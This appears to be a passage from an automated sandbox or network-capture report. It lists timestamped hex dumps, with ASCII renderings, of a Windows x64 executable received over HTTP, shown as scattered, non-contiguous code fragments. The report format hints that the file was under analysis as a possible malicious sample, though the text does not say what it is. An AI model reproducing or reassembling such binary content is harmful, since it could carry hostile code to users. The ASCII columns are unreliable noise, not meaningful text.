                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1601INData Raw: 30 45 31 c9 45 31 c0 31 d2 c7 44 24 20 00 00 00 00 49 89 cc e8 d2 f7 ff ff 45 31 c9 45 31 c0 31 d2 c7 44 24 20 01 00 00 00 4c 89 e1 e8 ba f7 ff ff 45 31 c9 45 31 c0 31 d2 c7 44 24 20 02 00 00 00 4c 89 e1 e8 a2 f7 ff ff 45 31 c9 45 31 c0 31 d2 c7 44 24 20 03 00 00 00 4c 89 e1 e8 8a f7 ff ff 45 31 c9 45 31 c0 31 d2 c7 44 24 20 04 00 00 00 4c 89 e1 e8 72 f7 ff ff 45 31 c9 45 31 c0 31 d2 c7 44 24 20 05 00 00 00 4c 89 e1 e8 5a f7 ff ff 45 31 c9 45 31 c0 31 d2 c7 44 24 20 06 00 00 00 4c 89 e1 e8 42 f7 ff ff 45 31 c0 31 d2 4c 89 e1 c7 44 24 20 07 00 00 00 45 31 c9 e8 2a f7 ff ff c7 44 24 20 08 00 00 00 45 31 c9 4c 89 e1 45 31 c0 31 d2 e8 12 f7 ff ff 90 48 83 c4 30 41 5c c3 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 38 c7 44 24 20 ff ff ff ff e8 ef f6 ff ff 48 83 c4
                                                                                                                                                                                                                    Data Ascii: 0E1E11D$ IE1E11D$ LE1E11D$ LE1E11D$ LE1E11D$ LrE1E11D$ LZE1E11D$ LBE11LD$ E1*D$ E1LE11H0A\f.H8D$ H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1617INData Raw: 66 66 2e 0f 1f 84 00 00 00 00 00 41 54 53 48 83 ec 28 48 89 cb eb 16 0f 1f 40 00 49 8b 4c 24 08 e8 96 ac fe ff 4c 89 e1 e8 9e 31 00 00 48 8b 83 b0 00 00 00 48 8b 88 20 01 00 00 e8 db 32 00 00 49 89 c4 48 85 c0 75 d3 48 83 c4 28 5b 41 5c c3 66 66 2e 0f 1f 84 00 00 00 00 00 41 54 53 48 83 ec 28 48 89 cb 48 8d 89 30 08 00 00 e8 aa 36 fb ff 48 89 d9 e8 02 da fb ff 48 8b 8b b0 00 00 00 48 85 c9 75 1f e9 8b 00 00 00 90 49 8b 4c 24 08 e8 26 ac fe ff 4c 89 e1 e8 2e 31 00 00 48 8b 8b b0 00 00 00 48 8b 89 18 01 00 00 e8 6b 32 00 00 49 89 c4 48 85 c0 75 d3 eb 13 90 49 8b 4c 24 08 e8 f6 ab fe ff 4c 89 e1 e8 fe 30 00 00 48 8b 83 b0 00 00 00 48 8b 88 20 01 00 00 e8 3b 32 00 00 49 89 c4 48 85 c0 75 d3 48 8b 83 b0 00 00 00 48 8b 88 18 01 00 00 e8 50 31 00 00 48 8b 83 b0
                                                                                                                                                                                                                    Data Ascii: ff.ATSH(H@IL$L1HH 2IHuH([A\ff.ATSH(HH06HHHuIL$&L.1HHk2IHuIL$L0HH ;2IHuHHP1H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1633INData Raw: 68 4f 00 c7 44 24 28 69 01 00 00 41 b9 44 00 00 00 48 89 44 24 20 41 b8 4b 02 00 00 ba 50 00 00 00 4c 89 e1 e8 d2 dd fd ff 31 c0 48 83 c4 48 5b 41 5c c3 0f 1f 84 00 00 00 00 00 89 44 24 3c 48 8d 05 85 68 4f 00 ba 50 00 00 00 41 b9 44 00 00 00 48 89 44 24 20 41 b8 4b 02 00 00 4c 89 e1 c7 44 24 28 70 01 00 00 e8 8f dd fd ff 8b 44 24 3c 48 83 c4 48 5b 41 5c c3 0f 1f 00 48 8d 05 49 68 4f 00 c7 44 24 28 63 01 00 00 41 b9 ed 00 00 00 48 89 44 24 20 e9 7c ff ff ff 90 41 55 41 54 56 53 48 83 ec 48 48 8b 81 a8 00 00 00 48 83 b8 e8 00 00 00 00 49 89 cc 89 d3 74 58 41 bd 01 00 00 00 85 db 74 16 44 89 e8 48 83 c4 48 5b 5e 41 5c 41 5d c3 0f 1f 84 00 00 00 00 00 49 8b 84 24 a8 00 00 00 48 8b 88 e0 00 00 00 e8 ac 58 01 00 49 8b 84 24 a8 00 00 00 48 c7 80 e0 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: hOD$(iADHD$ AKPL1HH[A\D$<HhOPADHD$ AKLD$(pD$<HH[A\HIhOD$(cAHD$ |AUATVSHHHHItXAtDHH[^A\A]I$HXI$H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1649INData Raw: 08 48 89 44 24 30 48 8b 44 24 40 48 89 44 24 38 e8 56 ce fb ff 48 89 c7 48 85 c0 0f 84 aa 01 00 00 31 d2 b9 fd 03 00 00 e8 6e 22 06 00 49 89 c7 48 85 c0 0f 84 ca 01 00 00 48 89 c1 e8 0a 13 06 00 85 c0 0f 8e ba 01 00 00 48 89 7c 24 28 41 b9 00 10 00 00 41 b8 00 04 00 00 4c 89 f9 c7 44 24 20 00 00 00 00 ba ff ff ff ff e8 9c 27 06 00 85 c0 0f 8e 8c 01 00 00 8b 44 24 30 48 83 c5 50 ba ff ff ff ff 4c 89 f9 48 89 6c 24 28 41 b9 01 10 00 00 41 b8 00 04 00 00 89 44 24 20 e8 6a 27 06 00 85 c0 0f 8e 5a 01 00 00 48 89 74 24 28 41 b9 02 10 00 00 41 b8 00 04 00 00 4c 89 f9 89 5c 24 20 ba ff ff ff ff e8 40 27 06 00 85 c0 0f 8e 30 01 00 00 8b 44 24 38 4c 89 6c 24 28 ba ff ff ff ff 41 b9 02 10 00 00 41 b8 00 04 00 00 4c 89 f9 89 44 24 20 e8 12 27 06 00 85 c0 0f 8e 02 01
                                                                                                                                                                                                                    Data Ascii: HD$0HD$@HD$8VHH1n"IHHH|$(AALD$ 'D$0HPLHl$(AAD$ j'ZHt$(AAL\$ @'0D$8Ll$(AALD$ '
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1665INData Raw: 5e 5f 41 5c 41 5d 41 5e c3 66 90 4d 85 f6 74 34 4c 89 f1 e8 db d2 29 00 48 89 c6 e9 74 ff ff ff 0f 1f 00 c7 44 24 20 22 01 00 00 4c 8d 0d b9 70 4f 00 31 d2 b9 0d 00 00 00 41 b8 df 00 00 00 e8 a7 33 04 00 41 8b 5c 24 10 f6 c3 10 0f 84 a9 00 00 00 81 e3 80 00 00 00 74 61 90 45 31 e4 eb 98 0f 1f 00 48 89 f9 48 8d 56 01 41 b9 2b 01 00 00 4c 8d 05 74 70 4f 00 e8 4f 60 06 00 49 89 44 24 08 48 89 c1 48 85 c0 0f 85 32 ff ff ff 41 b8 41 00 00 00 ba ba 00 00 00 b9 0d 00 00 00 c7 44 24 20 2e 01 00 00 4c 8d 0d 3f 70 4f 00 e8 3a 33 04 00 49 89 7c 24 08 eb 8c 0f 1f 00 41 b8 65 01 00 00 4c 89 ea 4c 89 e1 e8 7f 5f 06 00 eb 8d 0f 1f 44 00 00 c7 44 24 20 57 01 00 00 4d 89 e9 41 b8 41 00 00 00 ba 82 00 00 00 b9 0d 00 00 00 e8 f8 32 04 00 e9 00 ff ff ff 0f 1f 00 49 8b 4c 24
                                                                                                                                                                                                                    Data Ascii: ^_A\A]A^fMt4L)HtD$ "LpO1A3A\$taE1HHVA+LtpOO`ID$HH2AAD$ .L?pO:3I|$AeLL_DD$ WMAA2IL$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1681INData Raw: 89 7c 24 4c 0f 85 35 03 00 00 48 83 bc 24 c8 00 00 00 00 0f 84 e0 fe ff ff 8b 44 24 38 8b 54 24 40 41 89 d8 44 8b 4c 24 44 48 8b 8c 24 c8 00 00 00 89 44 24 20 e8 01 bc ff ff ff 55 18 8b 54 24 48 48 c7 44 24 68 00 00 00 00 48 89 c7 85 d2 0f 85 3a 01 00 00 4c 8b ac 24 c8 00 00 00 31 ed 48 8d 5c 24 60 eb 30 0f 1f 44 00 00 89 ea 48 89 f1 83 c5 01 e8 13 9c 0b 00 44 89 64 24 20 49 89 f8 4c 89 ea 41 b9 ff ff ff ff 48 89 d9 48 89 44 24 60 e8 d5 f7 ff ff 48 89 f1 e8 dd 9b 0b 00 39 c5 7c c9 e9 6f 02 00 00 0f 1f 40 00 c7 44 24 48 01 00 00 00 41 83 fd ff 0f 84 cc 02 00 00 40 f6 c7 10 b8 11 00 00 00 41 0f 44 c5 89 44 24 44 8b 44 24 38 0f 44 44 24 30 89 44 24 38 e9 9b fe ff ff 0f 1f 00 8b 7c 24 40 45 89 e8 89 c2 89 f9 e8 98 bc ff ff 48 83 bc 24 c8 00 00 00 00 89 c3 74
                                                                                                                                                                                                                    Data Ascii: |$L5H$D$8T$@ADL$DH$D$ UT$HHD$hH:L$1H\$`0DHDd$ ILAHHD$`H9|o@D$HA@ADD$DD$8DD$0D$8|$@EH$t
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1697INData Raw: 8d 0d f9 da 64 00 e8 70 67 0b 00 48 85 c0 74 0b 48 8b 40 10 48 83 c4 28 c3 66 90 31 c0 48 83 c4 28 c3 66 0f 1f 84 00 00 00 00 00 48 8b 41 28 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 31 d2 b9 00 01 00 00 e8 50 b9 05 00 85 c0 75 0c 48 83 c4 28 c3 0f 1f 80 00 00 00 00 48 8d 0d 9d da 64 00 e8 14 67 0b 00 48 85 c0 74 e3 48 83 78 10 00 74 dc 83 40 18 01 48 83 c4 28 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 31 d2 b9 00 01 00 00 e8 00 b9 05 00 85 c0 75 0c 48 83 c4 28 c3 0f 1f 80 00 00 00 00 48 8d 0d 4d da 64 00 e8 c4 66 0b 00 48 85 c0 74 e3 48 83 78 10 00 74 dc 8b 50 18 85 d2 74 d5 83 ea 01 89 50 18 48 83 c4 28 c3 90 90 90 90 90 90 41 b8 11 00 00 00 48 8d 15 c3 01 4f 00 b9 18 00 00 00 e9 29 e1 05 00 66 0f 1f 84 00 00 00 00 00 41 56 41 55
                                                                                                                                                                                                                    Data Ascii: dpgHtH@H(f1H(fHA(ff.H(1PuH(HdgHtHxt@H(ff.@H(1uH(HMdfHtHxtPtPH(AHO)fAVAU
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1713INData Raw: e8 d6 56 00 00 85 c0 74 12 41 bd fe ff ff ff eb 8d 66 2e 0f 1f 84 00 00 00 00 00 ff 15 d6 9f 95 00 ba 08 00 00 00 b9 02 00 00 00 c7 44 24 20 f6 00 00 00 41 89 c0 4c 8d 0d 0e c8 4e 00 e8 a9 73 03 00 41 b8 64 00 00 00 ba 65 00 00 00 c7 44 24 20 f7 00 00 00 4c 8d 0d ef c7 4e 00 b9 20 00 00 00 e8 85 73 03 00 e9 33 ff ff ff b9 02 00 00 00 e9 95 fe ff ff 66 0f 1f 44 00 00 48 83 ec 38 41 b8 01 00 00 00 89 54 24 48 48 63 c9 4c 8d 4c 24 48 ba 06 00 00 00 c7 44 24 20 04 00 00 00 ff 15 43 a0 95 00 85 c0 0f 94 c0 0f b6 c0 48 83 c4 38 c3 66 2e 0f 1f 84 00 00 00 00 00 53 48 83 ec 40 89 54 24 3c 48 63 c9 4c 8d 44 24 3c ba 7e 66 04 80 ff 15 e0 9f 95 00 89 c3 85 c0 78 0e 31 c0 85 db 0f 94 c0 48 83 c4 40 5b c3 90 ff 15 06 9f 95 00 ba 05 00 00 00 b9 02 00 00 00 c7 44 24 20
                                                                                                                                                                                                                    Data Ascii: VtAf.D$ ALNsAdeD$ LN s3fDH8AT$HHcLL$HD$ CH8f.SH@T$<HcLD$<~fx1H@[D$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1729INData Raw: 66 66 2e 0f 1f 84 00 00 00 00 00 48 8b 41 10 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8d 05 a9 fd ff ff 48 89 41 10 b8 01 00 00 00 48 89 51 18 c3 66 66 2e 0f 1f 84 00 00 00 00 00 b8 01 00 00 00 48 c7 41 18 00 00 00 00 48 89 51 10 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 48 8b 41 28 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8b 41 20 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8d 05 89 fd ff ff 48 89 41 20 b8 01 00 00 00 48 89 51 28 c3 66 66 2e 0f 1f 84 00 00 00 00 00 b8 01 00 00 00 48 c7 41 28 00 00 00 00 48 89 51 20 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 48 8b 41 30 c3 66 66 2e 0f 1f 84 00 00 00 00 00 b8 01 00 00 00 48 89 51 30 c3 66 0f 1f 44 00 00 48 8b 41 38 c3 66 66 2e 0f 1f 84 00 00 00 00 00 b8 01 00 00 00 48 89 51 38 c3 66 0f 1f 44 00 00 48 8b 41 40
                                                                                                                                                                                                                    Data Ascii: ff.HAff.HHAHQff.HAHQff.HA(ff.HA ff.HHA HQ(ff.HA(HQ ff.HA0ff.HQ0fDHA8ff.HQ8fDHA@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1745INData Raw: e9 29 ff ff ff 66 0f 1f 44 00 00 4d 89 e8 4c 89 e2 48 89 c1 e8 d2 23 00 00 85 c0 0f 85 71 ff ff ff 66 2e 0f 1f 84 00 00 00 00 00 45 31 e4 e9 76 ff ff ff 41 8b 44 24 10 33 43 18 41 bc 01 00 00 00 41 89 7e 08 41 89 46 10 e9 eb fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 41 54 53 48 83 ec 38 48 8d 1d 42 66 4e 00 41 b8 e8 00 00 00 b9 68 00 00 00 48 89 da e8 ff 1f 05 00 49 89 c4 48 85 c0 74 47 c7 00 00 00 00 00 48 8d 48 08 e8 a8 dd ff ff 49 8d 4c 24 20 e8 9e dd ff ff 49 8d 4c 24 38 e8 94 dd ff ff 66 0f ef c0 41 c7 44 24 60 01 00 00 00 41 0f 11 44 24 50 4c 89 e0 48 83 c4 38 5b 41 5c c3 66 0f 1f 44 00 00 c7 44 24 20 e9 00 00 00 49 89 d9 41 b8 41 00 00 00 ba 95 00 00 00 b9 03 00 00 00 e8 00 f3 02 00 eb cd 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 53 48 83 ec
                                                                                                                                                                                                                    Data Ascii: )fDMLH#qf.E1vAD$3CAA~AFff.fATSH8HBfNAhHIHtGHHIL$ IL$8fAD$`AD$PLH8[A\fDD$ IAAff.SH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1761INData Raw: 0f 7f 92 50 01 00 00 66 41 0f db 44 24 40 66 41 0f db 4c 24 50 66 41 0f db 54 24 60 66 41 0f 7f 9a 60 01 00 00 66 41 0f db 5c 24 70 66 0f eb c2 66 0f eb cb 66 41 0f 6f 64 24 80 66 41 0f 6f 6c 24 90 66 41 0f 6f 54 24 a0 66 41 0f db 62 70 66 41 0f 6f 5c 24 b0 66 41 0f db aa 80 00 00 00 66 0f eb c4 66 41 0f db 92 90 00 00 00 66 0f eb cd 66 41 0f db 9a a0 00 00 00 66 0f eb c2 66 0f eb cb 66 41 0f 6f 64 24 c0 66 41 0f 6f 6c 24 d0 66 41 0f 6f 54 24 e0 66 41 0f db a2 b0 00 00 00 66 41 0f 6f 5c 24 f0 66 41 0f db aa c0 00 00 00 66 0f eb c4 66 41 0f db 92 d0 00 00 00 66 0f eb cd 66 41 0f db 9a e0 00 00 00 66 0f eb c2 66 0f eb cb 66 41 0f 6f 24 24 66 41 0f 6f 6c 24 10 66 41 0f 6f 54 24 20 66 41 0f db a2 f0 00 00 00 66 41 0f 6f 5c 24 30 66 41 0f db aa 00 01 00 00 66
                                                                                                                                                                                                                    Data Ascii: PfAD$@fAL$PfAT$`fA`fA\$pfffAod$fAol$fAoT$fAbpfAo\$fAffAffAfffAod$fAol$fAoT$fAfAo\$fAffAffAfffAo$$fAol$fAoT$ fAfAo\$0fAf
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1777INData Raw: 03 28 41 88 0c 04 8d 42 03 41 39 c1 7e 5d 48 98 0f b6 4c 03 68 32 4c 03 28 41 88 0c 04 8d 42 04 41 39 c1 7e 46 48 98 0f b6 4c 03 68 32 4c 03 28 41 88 0c 04 8d 42 05 41 39 c1 7e 2f 48 98 83 c2 06 0f b6 4c 03 68 32 4c 03 28 41 88 0c 04 41 39 d1 7e 18 48 63 d2 0f b6 44 13 68 32 44 13 28 41 88 04 14 0f 1f 84 00 00 00 00 00 48 8b 0b 4d 89 e0 4c 89 e2 e8 82 ce 03 00 85 c0 0f 84 aa 01 00 00 b8 01 00 00 00 48 83 c4 38 5b 5e 41 5c 41 5d c3 66 2e 0f 1f 84 00 00 00 00 00 45 85 ed 7e cb 4c 8d 53 09 4c 89 e1 41 8d 55 ff 45 89 e8 4c 29 d1 48 83 f9 6e 0f 86 b8 01 00 00 83 fa 06 0f 86 af 01 00 00 83 fa 0e 0f 86 d2 01 00 00 f3 0f 6f 43 68 f3 0f 6f 5b 08 44 89 ea c1 ea 04 66 0f ef c3 41 0f 11 04 24 83 fa 01 74 14 f3 0f 6f 43 78 f3 0f 6f 6b 18 66 0f ef c5 41 0f 11 44 24 10
                                                                                                                                                                                                                    Data Ascii: (ABA9~]HLh2L(ABA9~FHLh2L(ABA9~/HLh2L(AA9~HcDh2D(AHMLH8[^A\A]f.E~LSLAUEL)HnoCho[DfA$toCxokfAD$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1793INData Raw: 0c 00 00 00 4c 89 e9 c6 44 24 35 00 88 54 24 34 48 8b 53 28 66 89 44 24 3e 48 0f ca 48 89 54 24 36 4c 89 e2 e8 02 5f 02 00 85 c0 0f 84 9a fe ff ff 8b 43 58 85 c0 0f 85 d1 00 00 00 4c 8b 76 28 48 8b 76 30 4d 85 f6 0f 84 7e fe ff ff 48 89 f2 31 c0 41 b8 03 00 00 00 4c 89 e9 48 c1 ea 10 40 88 74 24 36 88 d0 48 89 f2 48 c1 ea 08 88 d4 4c 89 e2 66 89 44 24 34 e8 af 5e 02 00 85 c0 0f 84 47 fe ff ff 49 89 f0 4c 89 f2 4c 89 e9 e8 99 5e 02 00 85 c0 0f 84 31 fe ff ff 0f b7 43 38 41 b8 02 00 00 00 4c 89 e2 4c 89 e9 66 c1 c0 08 66 89 44 24 34 e8 73 5e 02 00 85 c0 0f 84 0b fe ff ff 4c 8b 43 38 4d 85 c0 75 69 48 8b 53 48 4c 8b 43 50 4c 89 e9 e8 12 a6 03 00 41 89 c4 85 c0 0f 85 ea fd ff ff 41 b8 6b 00 00 00 ba 80 00 00 00 b9 32 00 00 00 c7 44 24 20 87 00 00 00 4c 8d 0d
                                                                                                                                                                                                                    Data Ascii: LD$5T$4HS(fD$>HHT$6L_CXLv(Hv0M~H1ALH@t$6HHLfD$4^GILL^1C8ALLffD$4s^LC8MuiHSHLCPLAAk2D$ L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1809INData Raw: e8 16 1e 0e 00 85 c0 0f 84 70 ff ff ff 4c 8b 46 10 89 5c 24 20 45 31 c9 4c 89 e1 48 8d 15 c3 72 4d 00 e8 f4 1d 0e 00 85 c0 0f 84 4e ff ff ff 4c 8b 46 18 89 5c 24 20 45 31 c9 4c 89 e1 48 8d 15 a7 72 4d 00 e8 d2 1d 0e 00 85 c0 0f 95 c0 0f b6 c0 e9 29 ff ff ff 0f 1f 44 00 00 56 53 48 83 ec 28 48 8b 42 28 48 89 d6 48 8b 50 08 48 8b 41 28 48 89 cb 48 8b 48 08 e8 cf ec fe ff 85 c0 74 0b 31 c0 48 83 c4 28 5b 5e c3 66 90 48 8b 46 28 48 8b 50 10 48 8b 43 28 48 8b 48 10 e8 ab ec fe ff 85 c0 75 dc 48 8b 46 28 48 8b 50 18 48 8b 43 28 48 8b 48 18 e8 92 ec fe ff 85 c0 0f 94 c0 0f b6 c0 48 83 c4 28 5b 5e c3 0f 1f 00 48 83 ec 28 48 8b 41 28 49 89 d0 48 8b 50 20 49 8b 40 28 48 8b 48 20 e8 64 ec fe ff 85 c0 0f 94 c0 0f b6 c0 48 83 c4 28 c3 0f 1f 80 00 00 00 00 57 56 53 48
                                                                                                                                                                                                                    Data Ascii: pLF\$ E1LHrMNLF\$ E1LHrM)DVSH(HB(HHPHA(HHHt1H([^fHF(HPHC(HHuHF(HPHC(HHH([^H(HA(IHP I@(HH dH(WVSH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1825INData Raw: a8 fd ff ff 41 8b 46 18 8d 4c 01 01 e9 9b fd ff ff 49 8b 56 10 48 85 d2 0f 84 5b 01 00 00 4d 63 46 18 48 89 c1 e8 d9 52 27 00 49 63 46 18 41 c6 04 07 3a 48 89 c6 4d 8b 4e 20 83 c6 01 4c 63 d6 4d 01 fa e9 07 fe ff ff 4c 8d 2d a6 3c 4d 00 4c 89 f1 41 b8 92 01 00 00 45 31 f6 4c 89 ea e8 a8 b5 04 00 49 89 c7 48 85 c0 0f 85 21 ff ff ff c7 44 24 20 94 01 00 00 4d 89 e9 41 b8 41 00 00 00 ba 86 00 00 00 b9 25 00 00 00 e8 5c b3 01 00 e9 1e ff ff ff 49 8b 54 24 30 45 8b 5c 24 38 4d 8b 56 20 41 8b 4e 28 49 89 56 30 45 89 5e 38 e9 ce fc ff ff 49 83 7e 10 00 0f 85 8b fc ff ff 41 8b 54 24 08 49 8b 04 24 41 89 56 08 49 8b 54 24 10 49 89 06 49 89 56 10 41 8b 54 24 18 41 89 56 18 e9 64 fc ff ff 48 85 d2 0f 85 ba fc ff ff 4d 85 c0 0f 85 b1 fc ff ff 8d 44 08 02 44 01 d8 e9
                                                                                                                                                                                                                    Data Ascii: AFLIVH[McFHR'IcFA:HMN LcML-<MLAE1LIH!D$ MAA%\IT$0E\$8MV AN(IV0E^8I~AT$I$AVIT$IIVAT$AVdHMDD
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1841INData Raw: 38 41 5c 41 5d 41 5e 41 5f c3 90 4c 89 e9 e8 f8 13 0d 00 41 b8 a7 00 00 00 ba 06 01 00 00 c7 44 24 20 31 02 00 00 4c 8d 0d 5e 00 4d 00 b9 10 00 00 00 e8 b4 73 01 00 4c 89 f2 4c 89 e1 e8 19 8d fd ff c7 44 24 20 d4 03 00 00 4c 8d 0d 3a 00 4d 00 41 b8 78 00 00 00 45 31 ed ba bf 00 00 00 b9 10 00 00 00 e8 82 73 01 00 44 89 e8 48 83 c4 38 41 5c 41 5d 41 5e 41 5f c3 66 90 41 b8 41 00 00 00 ba 06 01 00 00 b9 10 00 00 00 c7 44 24 20 1c 02 00 00 4c 8d 0d f1 ff 4c 00 e8 4c 73 01 00 eb a1 66 2e 0f 1f 84 00 00 00 00 00 41 56 41 55 41 54 57 56 53 48 83 ec 48 4c 8d 0d 2c 00 4d 00 48 8b 02 48 89 cb 48 89 d6 31 c9 48 89 44 24 38 48 8d 54 24 38 e8 b2 71 fd ff 49 89 c5 48 85 c0 0f 84 06 02 00 00 48 85 db 0f 84 95 01 00 00 4c 8b 23 4d 85 e4 0f 84 89 01 00 00 49 83 7d 10 00
                                                                                                                                                                                                                    Data Ascii: 8A\A]A^A_LAD$ 1L^MsLLD$ L:MAxE1sDH8A\A]A^A_fAAD$ LLLsf.AVAUATWVSHHL,MHHH1HD$8HT$8qIHHL#MI}
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1857INData Raw: 48 8b 01 48 83 78 50 00 74 51 4c 8d 2d da 20 4d 00 41 b8 97 02 00 00 b9 30 00 00 00 4c 89 ea e8 f7 61 03 00 49 89 c4 48 85 c0 0f 84 ab 00 00 00 48 8b 03 8b 53 20 4c 89 e1 49 89 04 24 41 89 54 24 08 ff 50 50 85 c0 74 42 4c 89 e0 48 83 c4 30 5b 41 5c 41 5d c3 0f 1f 44 00 00 c7 44 24 20 93 02 00 00 4c 8d 0d 81 20 4d 00 41 b8 42 00 00 00 45 31 e4 ba 79 00 00 00 b9 10 00 00 00 e8 69 33 01 00 eb c5 0f 1f 80 00 00 00 00 4c 89 e1 41 b8 a1 02 00 00 4c 89 ea 45 31 e4 e8 ac 5f 03 00 eb a8 66 2e 0f 1f 84 00 00 00 00 00 c7 44 24 20 8f 02 00 00 4c 8d 0d 31 20 4d 00 41 b8 43 00 00 00 45 31 e4 ba 79 00 00 00 b9 10 00 00 00 e8 19 33 01 00 e9 72 ff ff ff 0f 1f 40 00 c7 44 24 20 99 02 00 00 4d 89 e9 41 b8 41 00 00 00 ba 79 00 00 00 b9 10 00 00 00 e8 f0 32 01 00 e9 49 ff ff
                                                                                                                                                                                                                    Data Ascii: HHxPtQL- MA0LaIHHS LI$AT$PPtBLH0[A\A]DD$ L MABE1yi3LALE1_f.D$ L1 MACE1y3r@D$ MAAy2I
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1873INData Raw: 3c f7 01 74 9e 41 bd 01 00 00 00 eb 1c 42 8b 04 f7 49 83 c5 01 8d 48 ff b8 01 00 00 00 48 d3 e0 4c 39 e8 0f 86 7a ff ff ff 4a 8b 04 f3 4d 89 f9 48 89 f1 4e 8b 44 e8 f8 4a 8b 14 e8 48 89 6c 24 20 e8 75 db ff ff 85 c0 75 c3 eb 85 41 b8 44 00 00 00 ba bb 00 00 00 b9 10 00 00 00 c7 44 24 20 65 02 00 00 4c 8d 0d a0 e0 4c 00 e8 7b f3 00 00 48 8b 4c 24 78 41 b8 66 02 00 00 4c 89 e2 e8 c8 1f 03 00 e9 63 f6 ff ff 48 8b 94 24 98 00 00 00 48 89 f1 48 81 c4 d8 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f e9 a0 d0 ff ff 41 b8 44 00 00 00 ba bb 00 00 00 b9 10 00 00 00 c7 44 24 20 56 02 00 00 4c 8d 0d 41 e0 4c 00 e8 1c f3 00 00 48 8b 4c 24 78 41 b8 57 02 00 00 4c 89 e2 e8 69 1f 03 00 e9 04 f6 ff ff 31 ed e9 41 fa ff ff 48 8b 9c 24 80 00 00 00 4c 8b 6c 24 68 4d 89 fa 4c
                                                                                                                                                                                                                    Data Ascii: <tABIHHL9zJMHNDJHl$ uuADD$ eLL{HL$xAfLcH$HH[^_]A\A]A^A_ADD$ VLALHL$xAWLi1AH$Ll$hML
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1889INData Raw: 55 41 54 55 57 56 53 48 81 ec b8 01 00 00 48 8d 9c 24 ff 00 00 00 48 89 8c 24 00 02 00 00 48 89 94 24 08 02 00 00 48 83 e3 e0 4c 89 84 24 10 02 00 00 4c 89 8c 24 18 02 00 00 48 c7 84 24 b0 00 00 00 00 00 00 00 48 c7 84 24 b8 00 00 00 00 00 00 00 48 c7 84 24 c0 00 00 00 00 00 00 00 48 c7 84 24 c8 00 00 00 00 00 00 00 c6 84 24 d0 00 00 00 00 49 81 f9 fe ff ff 0f 0f 87 2c 02 00 00 48 8b 8c 24 30 02 00 00 e8 ef 1b 0d 00 48 83 bc 24 10 02 00 00 00 0f 84 f0 00 00 00 48 8b 8c 24 00 02 00 00 e8 a3 7a ff ff 48 89 c6 48 85 c0 0f 84 35 11 00 00 48 8b 84 24 00 02 00 00 48 8b b8 a0 00 00 00 48 85 ff 0f 84 82 0b 00 00 48 89 c1 e8 17 7f ff ff 49 89 c4 48 85 c0 74 35 48 8b 57 10 41 b8 01 00 00 00 48 89 d9 e8 1d 31 13 00 49 8b 4c 24 10 41 b8 04 00 00 00 48 89 da e8 7a 6c
                                                                                                                                                                                                                    Data Ascii: UATUWVSHH$H$H$HL$L$H$H$H$H$$I,H$0H$H$zHH5H$HHHIHt5HWAH1IL$AHzl
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1905INData Raw: 28 5b 5e c3 0f 1f 80 00 00 00 00 41 57 41 56 41 55 41 54 57 56 53 48 83 ec 30 4c 8b a4 24 90 00 00 00 48 89 ce 48 89 d1 48 89 d3 4d 89 c7 4d 89 ce e8 45 5b fd ff 83 f8 02 0f 8e 14 01 00 00 48 89 d9 e8 e4 73 fd ff 85 c0 0f 84 04 01 00 00 31 ff 4d 85 e4 0f 84 69 01 00 00 4c 89 e1 e8 19 dc 0c 00 4c 89 e1 e8 e1 dd 0c 00 49 89 c5 48 85 c0 0f 84 35 01 00 00 48 8b 4e 40 48 89 da e8 c9 61 fd ff 48 85 c0 0f 84 20 01 00 00 48 8b 4e 40 31 d2 e8 55 6f fd ff 4d 89 e1 49 89 d8 4c 89 fa 4c 89 e9 e8 d4 2f 0d 00 85 c0 0f 84 fc 00 00 00 48 8b 06 4c 8b 56 60 48 8b 80 28 01 00 00 48 85 c0 0f 84 cd 00 00 00 4d 89 e1 4d 89 e8 4c 89 d2 48 89 f1 ff d0 85 c0 0f 84 cf 00 00 00 48 8b 4e 68 4d 89 e1 49 89 d8 4c 89 f2 e8 8d 2f 0d 00 85 c0 0f 84 b5 00 00 00 48 8b 06 48 8b 80 28 01 00
                                                                                                                                                                                                                    Data Ascii: ([^AWAVAUATWVSH0L$HHHMME[Hs1MiLLIH5HN@HaH HN@1UoMILL/HLV`H(HMMLHHNhMIL/HH(
